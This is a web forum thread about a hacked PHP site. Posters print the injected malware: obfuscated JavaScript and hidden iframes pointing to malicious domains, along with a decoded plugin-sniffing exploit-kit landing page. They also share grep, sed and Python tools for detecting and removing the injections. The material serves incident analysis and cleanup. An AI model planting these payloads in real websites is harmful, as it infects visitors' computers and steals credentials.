
Thread: site hacked

  1. #1
    SitePoint Zealot
    Join Date
    Dec 2001
    Posts
    105

    site hacked

    Hello, just found a site that has been hacked. From what I see, I don't think it is a server hack but an exploit of some kind. It is a PHP page but with no database; an iframe was inserted with a redirect. The offending code is

    Code:
    <iframe frameborder=0 border=0 height=1 width=1 src="http://habrion.cn/in.cgi?3" /></body>
    </html>
    <script> eval(unescape("document.write%28String.fromCharCode%2860%2C105%2C102%2C114%2C97%2C109%2C101%2C32%2C115%2C114%2C99%2C61%2C34%2C104%2C116%2C116%2C112%2C58%2C47%2C47%2C100%2C97%2C115%2C114%2C101%2C116%2C111%2C107%2C102%2C105%2C110%2C46%2C99%2C111%2C109%2C47%2C105%2C110%2C100%2C101%2C120%2C46%2C112%2C104%2C112%2C34%2C32%2C119%2C105%2C100%2C116%2C104%2C61%2C34%2C48%2C34%2C32%2C104%2C101%2C105%2C103%2C104%2C116%2C61%2C34%2C48%2C34%2C32%2C115%2C116%2C121%2C108%2C101%2C61%2C34%2C100%2C105%2C115%2C112%2C108%2C97%2C121%2C58%2C110%2C111%2C110%2C101%2C59%2C34%2C62%2C60%2C47%2C105%2C102%2C114%2C97%2C109%2C101%2C62%29%29%3B")); </script><script>document.write(unescape("%3Ciframe%20src%3D%22http%3A%2F%2Fdasretokfin.com%2Findex.php%22%20width%3D%220%22%20height%3D%220%22%20style%3D%22display%3Anone%3B%22%3E%3C%2Fiframe%3E"));</script>
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
    <html xmlns="http://www.w3.org/1999/xhtml">
    Any ideas how to track this hack down?

    cheers

  2. #2
    SitePoint Zealot
    Join Date
    Oct 2008
    Posts
    167
    Check the FTP logs on the server. Check to see if anyone logged into your account and uploaded this file.
    CanisHosting - Web Hosting plans starting at $3.95 per month

  3. #3
    SitePoint Wizard silver trophy Crazybanana's Avatar
    Join Date
    Mar 2003
    Location
    In tha fruit cellar
    Posts
    1,379
    hmm... now, if I'm not wrong here, I believe you've been hit by an injection attack, triggered by the xml-rpc vulnerability scanner and exploiter or the PHP injection scanner and exploiter. If this is the case you probably have a backdoor or two there as well.

    Can you find a file named nstview.php or some variant of the name? Try also to search for c99shell.php or c99madshell.php or variants of these, as they have been related to this kind of hack.

    These files, if found, are backdoors/shells to your system.

    The iframe redirects to dasretokfin..., where there is an exploit trying to take advantage of the "Adobe Acrobat and Reader Multiple Arbitrary Code Execution and Security Vulnerabilities" and the "Adobe Acrobat and Reader Collab 'getIcon()' JavaScript Method Remote Code Execution Vulnerability", which is included in the index page from "spl.php".

    The "habrion" address looks like an exploit too, or a redirect to an exploit... can't see why it should appear there for any other reason...

    Anyway, if what I believe is true, these exploits can be on many of your pages and there may be backdoors there too, so try scanning and searching your files for these kinds of threats.

    Maybe you can enlighten us about the system your site is running... is it a forum, some kind of CMS, or what?
    Who's to doom when the judge himself is dragged before the bar


    Home | Web | Facebook

  4. #4
    SitePoint Enthusiast
    Join Date
    Aug 2008
    Location
    Everett WA
    Posts
    80
    I would also suggest checking the Apache logs for the site to see what kind of activity has been happening in relation to your PHP pages. If you have any pre-made PHP applications, check to see if they are out of date; if so, update them. A common exploit is to remotely load PHP code of their choice through some PHP application that does not make the appropriate checks, and from there they may be given access in some fashion to the files on the server. Also make sure that the login information is secure for this site: if you use a dictionary word for a password with a common user, such as info:gateway, it will be guessed quickly; people are constantly scanning. Follow the minimal password guideline of at least one number, symbol, upper case, and lower case letter, with a minimum of 8 characters. Oh, and p@$$w0rd and variants are quickly guessed too; use common sense.

    Other than that, use good security practices with programming: don't use the same login information that is stored in a file on your site for the login to your server via FTP/SFTP or SSH, and keep your PHP software applications up to date. Be familiar with your logs, and watch for weird POSTs in your Apache access log. A PHP file on your site that includes a foreign URL is never a good sign.
    Jonathan Kinney
    Data Systems Specialist
    Advantagecom Networks, Inc.
    http://www.simplywebhosting.com

  5. #5
    SitePoint Wizard silver trophy Crazybanana's Avatar
    Join Date
    Mar 2003
    Location
    In tha fruit cellar
    Posts
    1,379
    after decoding the obfuscated code
    Code:
     
    <script> eval(unescape("document.write%28String.fromCharCode%2860%2C105%2C102%2C114%2C97%2C109%2C101%2C32%2C115%2C114%2C99%2C61%2C34%2C104%2C116%2C116%2C112%2C58%2C47%2C47%2C100%2C97%2C115%2C114%2C101%2C116%2C111%2C107%2C102%2C105%2C110%2C46%2C99%2C111%2C109%2C47%2C105%2C110%2C100%2C101%2C120%2C46%2C112%2C104%2C112%2C34%2C32%2C119%2C105%2C100%2C116%2C104%2C61%2C34%2C48%2C34%2C32%2C104%2C101%2C105%2C103%2C104%2C116%2C61%2C34%2C48%2C34%2C32%2C115%2C116%2C121%2C108%2C101%2C61%2C34%2C100%2C105%2C115%2C112%2C108%2C97%2C121%2C58%2C110%2C111%2C110%2C101%2C59%2C34%2C62%2C60%2C47%2C105%2C102%2C114%2C97%2C109%2C101%2C62%29%29%3B")); </script>
    I sit here with this:
    Code:
     
    <iframe src = "http://logitech1.extra.hu/ice_en_clean/index.php" width = "0" height = "0"> </ iframe>
    which again seems to not exist anymore... It used to contain a Russian ad banner, but logitech1 is also known to contain a JS/VBS script/exploit to a backdoor downloader, though it has only worked on IE as far as I know... I tried to go to it, but was redirected to extra.hu, and there was nothing downloaded or installed here, nor was there anything suspicious in my temp files after visiting, so it seems like it is outdated and gone...

    I'm now pretty sure you have some outdated software running there and this Russian "hack-pack" has found it in a scan and exploited it.

    If I'm right, this is from a Russian hacktool set of scanners and exploits released, as far as I know, about 3 years ago.

    This packet contained the exploits and backdoor creator nstview and c99shell, and later the c99madshell as well. It also contained the xml-rpc vulnerability scanner and exploiter and the PHP injection scanner and exploiter.

    Then you have this redirect to dasretokfin and the exploit there as well...

    I'm not 100% sure this is what I suspect, but it looks similar to the footprints of the tools in this hack tool packet, so check and clean your files before you take a backup.

    Also do as Kinney suggests: update, check your logs, and change passwords as well...

    Good Luck!
    Who's to doom when the judge himself is dragged before the bar


    Home | Web | Facebook

  6. #6
    SitePoint Enthusiast
    Join Date
    Jun 2006
    Posts
    97
    Why would you be interested? Because it is your site? If so, you should show us some of your dynamic code mainly all AJAX, login, etc security sensitive source code.

  7. #7
    SitePoint Zealot
    Join Date
    Dec 2001
    Posts
    105
    Hello and thanks for the replies. I could not find any of those files and the server does not appear to be rooted; however, I did find a number of scans from exploit scanners in the logs and added redirects in .htaccess. I know this is not the best way, but as the front page was hacked again I needed to do something. I did find an old install of Xara in a subdir and have told them to remove it along with all files not being used by the site. This is the only site being affected, so hopefully this will cure the issue. Got a feeling it may be due to the old Xara install.

  8. #8
    SitePoint Enthusiast
    Join Date
    Aug 2008
    Location
    Everett WA
    Posts
    80
    I have found a version of this in action and have examined it. Here are the first steps: make sure you have updated your Adobe Reader and Shockwave/Flash plugins, and make sure you have a good antivirus/antimalware application running on your system. The instance of this that I found spreads through people's sites for which they have the FTP login information. They modify a ton of different pages in many different ways to direct people, without them knowing it, to their server, which runs a CGI script and JavaScript to determine what plugins your browser is using, and then it will attempt to feed your browser the appropriate .pdf and/or .swf with exploit code in it, which infects the computer of the person who is browsing the site. The infected computer then has a trojan, which in this instance listens and searches for FTP and perhaps other login information to sites, which it reports back to a central server, which then periodically processes the sites, downloading, modifying, and then re-uploading the new infected site files. The site's files are infected in specific ways depending on how they are named and what kind of file it is. For example, all files that contain the word home, default, index, etc. are modified as if they are the main index pages. Depending on the extension, it will insert the appropriate code, so it differs when modifying a .php, .html, .js, .shtml, and so on. They do it this way so that it can work as cleanly as possible without detection, so the site can be infecting as many people as possible for as long as possible. Much of the code inserted will be encoded in various different ways so that it is not plainly readable, so they can hide exactly what they are doing to a certain extent. In plain HTML files, they often use hidden iframe tags to get their payload to the end browser and its plugins. The rest deal in PHP code, includes, and encoded JavaScript, with a few exceptions.
    One last thing: it seems that, at least in this instance I saw, it involved .cn domains where it loaded the exploits from.

    It is actually quite neat to see something like this in action, not that it is good, but wow, quite an operation. Not that it is without its flaws, it can tend to eat the end of files sometimes, and it has a tendency of generating replacement files that do not have a correct end of line. They probably use sed to process the files with a search and replace string.

    I have helped clean up a pile of sites that have been hit, so if you want some nice sed and perl search and replace strings, I can give some good examples.
    Jonathan Kinney
    Data Systems Specialist
    Advantagecom Networks, Inc.
    http://www.simplywebhosting.com

  9. #9
    SitePoint Enthusiast
    Join Date
    Jul 2007
    Posts
    44
    For anyone interested in the motives and strategies of the people behind these ongoing script injection attacks, check out Dancho Danchev's blog for comprehensive analysis. It is interesting reading and relevant to anyone running a web hosting business.

  10. #10
    SitePoint Enthusiast
    Join Date
    Aug 2008
    Location
    Everett WA
    Posts
    80
    Here are some examples of the search and replace commands I put together. It took a lot of time to work through this and put them together, so I figured it would not hurt to put some examples out there that others could use. The standard process was to find the files with the exploit and generate a list of files, back them up, and then perform the search and replace on them. I had to switch from using Perl one-liners to sed due to the need to search and replace more than one line. If you are working with a single line, Perl works great though. Also you may need to upgrade your sed or grep to use some of these options, as older versions on older distributions were found lacking. And of course you will want to examine the results of the grep and search and replace to make sure it is matching only what it needs to.

    If you are curious and manage several clients on one server, you can just use the grep commands to see if it finds any matches. Often a person does not even know they are infected, at least right away.


    Code:
    ## iframe exploit search and replace notes:
    grep -rliPo '\<iframe src=\"http.*hidden\"\>\<\/iframe\>' /home/*/*/html/ > iframe-html-exploit-file-list.txt
    tar cpjf iframe-html-exploit-file-backup.tar.bz2 `cat iframe-html-exploit-file-list.txt`
    perl -pi -e 's/\<iframe src=\"http.*hidden\"\>\<\/iframe\>//g' `cat iframe-html-exploit-file-list.txt`
    
    ## PHP exploit search and replace:
    grep -rliPo '\<\?php\ if\(\!function_exists\(.*\(\)\;\ \?\>' /home/*/*/html/ > php-function-insert-exploit-file-list.txt
    tar cpjf php-function-insert-exploit-file-backup.tar.bz2 `cat php-function-insert-exploit-file-list.txt`
    perl -pi -e 's/\<\?php\ if\(\!function_exists\(.*\(\)\;\ \?\>//g' `cat php-function-insert-exploit-file-list.txt`
    
    ## SHTML java exploit search and replace:
    grep -rliPo '\<script\ language\=javascript\>\<\!\-\-\ \s.+\s\ \-\-\>\<\/script\>' /home/*/*/html/ > shtml-javascript-include-exploit-file-list.txt
    tar cpjf shtml-javascript-include-exploit-file-backup.tar.bz2 `cat shtml-javascript-include-exploit-file-list.txt`
    sed -ni '1h;1!H;${;g;s/<script language=javascript><!-- .*(function(.* --><\/script>//g;p;}' `cat shtml-javascript-include-exploit-file-list.txt`
    
    ## 02-SHTML another java exploit search and replace:
    grep -rliPo '\<script\ language\=javascript\>\<\!\-\-\s+.+\s+\-\-\>\<\/script\>' /home/*/*/html/ >02-shtml-javascript-include-exploit-file-list.txt
    tar cpjf 02-shtml-javascript-include-exploit-file-backup.tar.bz2 `cat 02-shtml-javascript-include-exploit-file-list.txt`
    sed -ni '1h;1!H;${;g;s/<script language=javascript><!-- .*(function(.* --><\/script>//g;p;}' `cat 02-shtml-javascript-include-exploit-file-list.txt`
    
    ## dotjs javascript include exploit search and replace
    grep -rliPo '\<\!\-\-\s+\(function\(.+\)\;\s+' `cat ~/broken_site_list.txt` > dotjs-javascript-include-exploit-file-list.txt
    tar cpjf dotjs-javascript-include-exploit-file-backup.tar.bz2 `cat dotjs-javascript-include-exploit-file-list.txt`
    sed -ni '1h;1!H;${;g;s/<script language=javascript><!-- .*(function(.* --><\/script>//g;p;}' `cat dotjs-javascript-include-exploit-file-list.txt`
    sed -ni '1h;1!H;${;g;s/<!-- .*(function(.* -->//g;p;}' `cat dotjs-javascript-include-exploit-file-list.txt`
    
    ## image.php etc. files that were new and uploaded, but need to be neutralized:
    grep -rliPo '\<\?php\s+eval\(base64\_decode.+\;\s+\?\>' `cat ~/broken_site_list.txt` > image-php-exploit-file-list.txt
    tar cpjf image-php-exploit-file-backup.tar.bz2 `cat image-php-exploit-file-list.txt`
    sed -ni '1h;1!H;${;g;s/<?php eval(base64_decode.*; ?>//g;p;}' `cat image-php-exploit-file-list.txt`
    
    ## echo-php-iframe-exploit
    grep -rliP '\<iframe\s+src\=.+http\:\/\/' `cat ~/broken_site_list.txt` > remainder-iframe-exploit-file-list.txt
    tar cpjf remainder-iframe-exploit-file-backup.tar.bz2 `cat remainder-iframe-exploit-file-list.txt`
    sed -ni '1h;1!H;${;g;s/.echo "<iframe src=\\"http.*\\"><\/iframe>";//g;p;}' `cat remainder-iframe-exploit-file-list.txt`
    sed -ni '1h;1!H;${;g;s/<iframe src="http.*visibility:hidden.*"><\/iframe>//g;p;}' `cat remainder-iframe-exploit-file-list.txt`
    Jonathan Kinney
    Data Systems Specialist
    Advantagecom Networks, Inc.
    http://www.simplywebhosting.com
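A static de-obfuscator for the injected markup quoted in post #1 (which post #5 decodes by hand) that also checks for the markers post #10's grep commands target. This is an added example, not code from the thread: it rewrites `unescape("...")` and `String.fromCharCode(...)` calls into their literal results with plain string substitution, never executing the script, and then lists the hidden iframe targets. The sample input is the thread's own payload, constructed here as a Python string.

```python
import re
from urllib.parse import unquote

# Constructed sample: the injected markup quoted in post #1, reduced to the
# unquoted-attribute iframe and the two <script> blocks (payload copied as posted).
SAMPLE = (
    '<iframe frameborder=0 border=0 height=1 width=1 src="http://habrion.cn/in.cgi?3" /></body>\n'
    '<script> eval(unescape("document.write%28String.fromCharCode%2860%2C105%2C102%2C114%2C97%2C109%2C101%2C32%2C115%2C114%2C99%2C61%2C34%2C104%2C116%2C116%2C112%2C58%2C47%2C47%2C100%2C97%2C115%2C114%2C101%2C116%2C111%2C107%2C102%2C105%2C110%2C46%2C99%2C111%2C109%2C47%2C105%2C110%2C100%2C101%2C120%2C46%2C112%2C104%2C112%2C34%2C32%2C119%2C105%2C100%2C116%2C104%2C61%2C34%2C48%2C34%2C32%2C104%2C101%2C105%2C103%2C104%2C116%2C61%2C34%2C48%2C34%2C32%2C115%2C116%2C121%2C108%2C101%2C61%2C34%2C100%2C105%2C115%2C112%2C108%2C97%2C121%2C58%2C110%2C111%2C110%2C101%2C59%2C34%2C62%2C60%2C47%2C105%2C102%2C114%2C97%2C109%2C101%2C62%29%29%3B")); </script>'
    '<script>document.write(unescape("%3Ciframe%20src%3D%22http%3A%2F%2Fdasretokfin.com%2Findex.php%22%20width%3D%220%22%20height%3D%220%22%20style%3D%22display%3Anone%3B%22%3E%3C%2Fiframe%3E"));</script>\n'
)

UNESCAPE_RE = re.compile(r'unescape\(\s*"((?:[^"\\]|\\.)*)"\s*\)')
FROMCHARCODE_RE = re.compile(r'String\.fromCharCode\(\s*([\d\s,]*\d)\s*\)')
IFRAME_RE = re.compile(r'<iframe\b([^>]*)>', re.IGNORECASE)
ATTR_RE = re.compile(r'''([\w:-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+))''')
# Markers seen in the quoted payload and in the patterns post #10 greps for.
MARKERS = {
    'eval-unescape': re.compile(r'eval\s*\(\s*unescape\s*\('),
    'fromcharcode': re.compile(r'String\.fromCharCode'),
    'php-eval-base64': re.compile(r'<\?php\s+eval\s*\(\s*base64_decode'),
}

def js_unescape(s):
    """Emulate JavaScript unescape(): %uXXXX code units, then %XX as Latin-1."""
    s = re.sub(r'%u([0-9a-fA-F]{4})', lambda m: chr(int(m.group(1), 16)), s)
    return unquote(s, encoding='latin-1')

def deobfuscate(text, max_rounds=8):
    """Substitute unescape("...") and String.fromCharCode(...) calls with their
    literal results until nothing changes. Pure string rewriting: the script is
    never executed, so this is safe to run over infected files."""
    for _ in range(max_rounds):
        before = text
        text = UNESCAPE_RE.sub(lambda m: js_unescape(m.group(1)), text)
        text = FROMCHARCODE_RE.sub(
            lambda m: ''.join(chr(int(c)) for c in m.group(1).replace(' ', '').split(',') if c),
            text)
        if text == before:
            break
    return text

def iframe_sources(html):
    """Return [(src, hidden)] per iframe; 'hidden' flags the tricks used here:
    0/1-pixel size, display:none, visibility:hidden."""
    found = []
    for tag in IFRAME_RE.finditer(html):
        attrs = {}
        for a in ATTR_RE.finditer(tag.group(1)):
            attrs[a.group(1).lower()] = next(v for v in a.groups()[1:] if v is not None)
        style = attrs.get('style', '').replace(' ', '').lower()
        hidden = (attrs.get('width') in ('0', '1') or attrs.get('height') in ('0', '1')
                  or 'display:none' in style or 'visibility:hidden' in style)
        if 'src' in attrs:
            found.append((attrs['src'], hidden))
    return found

def scan(html):
    """Markers present in the raw file, plus the hidden-iframe targets that
    appear once the obfuscation layers are peeled."""
    markers = sorted(name for name, rx in MARKERS.items() if rx.search(html))
    targets = sorted({src for src, hidden in iframe_sources(deobfuscate(html)) if hidden})
    return {'markers': markers, 'hidden_iframe_targets': targets}
```

Running `scan(SAMPLE)` reports both obfuscation markers and the two hidden iframe targets (habrion.cn and dasretokfin.com), which is what you would feed into a grep list before cleaning files.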

  11. #11
    SitePoint Member 8hrarcade's Avatar
    Join Date
    Jun 2009
    Posts
    10
    I have had many problems like this in the past. It got really freakin annoying...

  12. #12
    SitePoint Enthusiast
    Join Date
    Aug 2008
    Location
    Everett WA
    Posts
    80
    For searchability sake, here is what the end user's browser will eventually load due to one of those hidden iframe tags in an infected site:

    Code:
    <html>
    
    <body>
    
    <script>
    
    function pdfswf()
    {
            try
            {
                    for(i = 0; i <= navigator.plugins.length; i++)
                    {
                            name = navigator.plugins[i].name;
    
                            if((name.indexOf("Adobe Acrobat") != -1) || (name.indexOf("Adobe PDF") != -1))
                            {
                                    document.write('<iframe src="cache/readme.pdf"></iframe>');
                            }
    
                            if(name.indexOf("Flash") != -1)
                            {
                                    document.write('<iframe src="cache/flash.swf"></iframe>');
                            }
                    }
            }
    
            catch(e){}
    }
    
    pdfswf();
    
    </script>
    
    </body>
    
    </html>
    It's an elegant little piece of code that checks for Flash or Acrobat plugins and serves the exploit documents. I am sure there are other ways, but this is the only way I have seen in action in the instances I have seen.
    Jonathan Kinney
    Data Systems Specialist
    Advantagecom Networks, Inc.
    http://www.simplywebhosting.com

  13. #13
    SitePoint Wizard frank1's Avatar
    Join Date
    Oct 2005
    Posts
    1,392
    Quote Originally Posted by Jonathan Kinney
    I have found a version of this in action and have examined it. Here are the first steps, make sure you have updated your Adobe Reader and Shockwave/Flash plugins, and make sure you have a good antivirus/antimalware application running on your system. The instance of this that I found spreads through people's sites for which they have the FTP login information. They modify a ton of different pages in many different ways, to direct people without them knowing it, to their server, which runs a cgi script and java script to determine what plugins your browser is using, and then it will attempt to feed your browser the appropriate .pdf and/or .perl search and replace strings, I can give some good examples.
    From what we understand,
    some of our clients use software like CoreFTP which saves the username and password of the site... so does it mean that it should not be done... and it makes things easier to search files... password files...

    Can't we examine what is using our software... trying to mail...?
    Or aren't modern antivirus and embedded firewalls smart enough to detect it?

    What is used to email details from our computers...

    We have also been in this situation and usually a password change has solved our problems... up to now...

  14. #14
    SitePoint Enthusiast
    Join Date
    Aug 2008
    Location
    Everett WA
    Posts
    80
    If your computer is compromised, then yes, it would be bad to have your login information saved in any program unencrypted, because it could be retrieved, period. This exploit, if successful, gains full administrative privileges to your system and so has all the access that you do, and they can see, monitor, and gather any and all information about what you do or have on your system.

    No, antivirus systems are not good enough; the exploit code changes so quickly that most antivirus software cannot detect it, because it is not a classic virus. Unfortunately it is more and more left up to the end user's education and knowledge of how to keep a system up to date and secure, and sadly that leaves many people unequipped. For example, just check out the uneducated people posting comments on the Firefox plugin called "YesScript", which is so foolishly listed under security:

    https://addons.mozilla.org/en-US/fir...n/4922?src=api

    It's like people don't get the fact that security is a preventative measure, not a cleanup-after-the-fact measure. The big metal door on a safe in a bank is not just left open until someone steals stuff, and then they don't like it, so they close it; the door is there to prevent things from being stolen in the first place. That is what security is.

    It's no longer just a matter of using a secure browser; now you have to watch out for all the plugins secretly installed into a browser, and all the applications that they can trigger. All of that stuff that can be called on via a webpage must also be secure and free of exploits.

    If you are affected by this type of issue, I would suggest that you remove the computer from the network, and wipe the system, saving only the data that you need, and start from a fresh install. Then change your passwords. And as you are keeping your software up to date (including software related to plugins and addons to your browser), watch out for broken software updaters such as what Adobe Reader had, which kept me from updating to the latest version.
    Jonathan Kinney
    Data Systems Specialist
    Advantagecom Networks, Inc.
    http://www.simplywebhosting.com
